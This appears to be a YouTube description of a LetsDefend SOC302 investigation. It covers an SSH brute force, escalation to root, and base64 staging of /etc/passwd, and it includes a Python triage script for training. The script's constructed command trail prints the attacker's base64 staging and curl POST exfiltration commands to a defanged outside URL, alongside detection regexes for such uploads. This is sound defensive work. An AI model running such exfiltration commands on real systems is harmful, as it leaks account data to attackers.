Suspicious Base64 Commands SSH Brute Force, Root Escalation & /etc/passwd Exfil | LetsDefend SOC302

Published: 16 May 2026
On channel: InkSec

Day 115 of Becoming a SOC Analyst — SOC302 Suspicious Base64 Encoding/Decoding Commands Detected (True Positive)
The attacker at 89.187.185.184 brute-forced SSH on the Linux host Clark (172.16.20.43), eventually authenticating as analyst and escalating to root with sudo su. From the root shell they ran getent passwd for account recon, base64-encoded /etc/passwd into /root/Documents/encoded.dat to obfuscate the staged data, then attempted exfiltration with a curl POST to hxxp://ukr-net-files-loading-application.ru/upload. The firewall logs do not confirm a successful outbound transfer, but decoding the staged file confirmed its contents as /etc/passwd (account names, UIDs and shells; password hashes live in /etc/shadow, so this is a credential harvesting attempt that yields targets rather than hashes). Verdict: true positive, endpoint contained.
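Added example (my own illustration, not the video's work and not a LetsDefend artefact): a small Python triage script that reconstructs the same chain from constructed evidence. It assumes auth.log-style sshd lines, a `user|command` shell audit trail, and a base64 blob standing in for encoded.dat; the sample lines, the 3-failure threshold and the defanged hxxp URL are all constructed for the example, so nothing here contacts the real domain.

```python
"""Triage of an SSH brute force -> sudo su -> base64 staging -> curl POST chain.
All sample data below is constructed for this example; it is not real host data."""
import base64
import re

# Constructed sshd auth.log: five failures then a success from one IP, plus benign noise.
AUTH_LOG = """\
May 16 10:01:01 Clark sshd[2101]: Failed password for analyst from 89.187.185.184 port 51122 ssh2
May 16 10:01:02 Clark sshd[2101]: Failed password for analyst from 89.187.185.184 port 51123 ssh2
May 16 10:01:03 Clark sshd[2101]: Failed password for invalid user admin from 89.187.185.184 port 51124 ssh2
May 16 10:01:04 Clark sshd[2101]: Failed password for analyst from 89.187.185.184 port 51125 ssh2
May 16 10:01:05 Clark sshd[2101]: Failed password for analyst from 89.187.185.184 port 51126 ssh2
May 16 10:01:06 Clark sshd[2102]: Accepted password for analyst from 89.187.185.184 port 51127 ssh2
May 16 10:05:00 Clark sshd[2200]: Accepted publickey for backup from 10.0.0.5 port 40000 ssh2
"""

# Constructed command trail in "user|command" form (assumed audit format).
CMD_TRAIL = """\
analyst|whoami
analyst|sudo su
root|getent passwd
root|base64 /etc/passwd > /root/Documents/encoded.dat
root|curl -X POST -d @/root/Documents/encoded.dat hxxp://ukr-net-files-loading-application.ru/upload
"""

# Constructed /etc/passwd excerpt; its base64 form stands in for encoded.dat.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
analyst:x:1000:1000:analyst:/home/analyst:/bin/bash
"""
STAGED_FILE = base64.b64encode(SAMPLE_PASSWD.encode())

SSH_RE = re.compile(r"(Failed|Accepted) (?:password|publickey) for (?:invalid user )?(\S+) from (\d+(?:\.\d+){3})")
B64_RE = re.compile(r"\bbase64\b.*?(/etc/(?:passwd|shadow|group))\b.*?>\s*(\S+)")
EXFIL_RE = re.compile(r"\b(?:curl|wget)\b.*?(?:-X\s*POST|--data\S*|-d\s|-F\s|-T\s|--post-file).*?(h[tx]{2}ps?://\S+)")
PASSWD_RE = re.compile(r"^[^:\s]+:[^:]*:(\d+):(\d+):[^:]*:[^:]*:[^:]*$")


def ssh_bruteforce_then_success(auth_log, threshold=3):
    """IPs with >= threshold failed logins that also obtained an Accepted login."""
    failed, accepted = {}, {}
    for line in auth_log.splitlines():
        m = SSH_RE.search(line)
        if not m:
            continue
        outcome, user, ip = m.groups()
        if outcome == "Failed":
            failed[ip] = failed.get(ip, 0) + 1
        else:
            accepted.setdefault(ip, []).append(user)
    return {ip: {"failed": n, "accepted": accepted[ip]}
            for ip, n in failed.items() if n >= threshold and ip in accepted}


def _trail(cmd_trail):
    for line in cmd_trail.splitlines():
        user, _, cmd = line.partition("|")
        yield user, cmd.strip()


def find_priv_esc(cmd_trail):
    """Users who spawned a root shell via sudo su / sudo -i / su."""
    return [u for u, c in _trail(cmd_trail) if c.startswith(("sudo su", "sudo -i", "su "))]


def flag_base64_staging(cmd_trail):
    """(user, sensitive source, staging path) for base64 *encoding* of sensitive files."""
    hits = []
    for user, cmd in _trail(cmd_trail):
        if re.search(r"\s(?:-d|--decode)\b", cmd):
            continue  # decoding is a different signal; this alert is about staging
        m = B64_RE.search(cmd)
        if m:
            hits.append((user, m.group(1), m.group(2)))
    return hits


def confirm_passwd_staging(staged):
    """Decode the staged blob and check every line has the 7-field passwd layout."""
    try:
        text = base64.b64decode(staged, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return {"is_passwd": False}
    lines = [l for l in text.splitlines() if l]
    entries = [PASSWD_RE.match(l) for l in lines]
    if not lines or not all(entries):
        return {"is_passwd": False}
    login = [l.split(":")[0] for l in lines if not l.endswith(("nologin", "/bin/false"))]
    return {"is_passwd": True, "has_root": any(m.group(1) == "0" for m in entries),
            "accounts": len(lines), "login_capable": login}


def find_exfil(cmd_trail, staged_paths):
    """(user, url) for curl/wget uploads that reference a known staging path."""
    return [(u, m.group(1)) for u, c in _trail(cmd_trail)
            if (m := EXFIL_RE.search(c)) and any(p in c for p in staged_paths)]


def triage(auth_log=AUTH_LOG, cmd_trail=CMD_TRAIL, staged=STAGED_FILE):
    staging = flag_base64_staging(cmd_trail)
    report = {
        "initial_access": ssh_bruteforce_then_success(auth_log),
        "priv_esc": find_priv_esc(cmd_trail),
        "staging": staging,
        "staged_contents": confirm_passwd_staging(staged),
        "exfil": find_exfil(cmd_trail, [s[2] for s in staging]),
    }
    complete = all([report["initial_access"], report["priv_esc"], staging,
                    report["staged_contents"]["is_passwd"], report["exfil"]])
    report["verdict"] = "True Positive" if complete else "Needs review"
    return report


if __name__ == "__main__":
    for k, v in triage().items():
        print(f"{k}: {v}")
```

The decode step is the one that turns a noisy "base64 command seen" alert into a verdict: only after `confirm_passwd_staging` shows seven-field passwd records with a UID-0 entry do you know what was staged, and the exfil finding is only counted when the upload command references that same staging path.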
🔬 Analysis Reports
🔍 AbuseIPDB (89.187.185.184) → https://www.abuseipdb.com/check/89.18...
🦠 VirusTotal (exfil URL) → https://www.virustotal.com/gui/url/c7...
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.

00:00 Day 115 intro
00:25 Alert Details
01:27 Investigation
13:10 Playbook Answers
21:00 5W Log
24:45 Result

🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #Base64 #SSHBruteForce #PrivilegeEscalation #DataExfiltration #Linux #IncidentResponse #SIEM #Day115 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity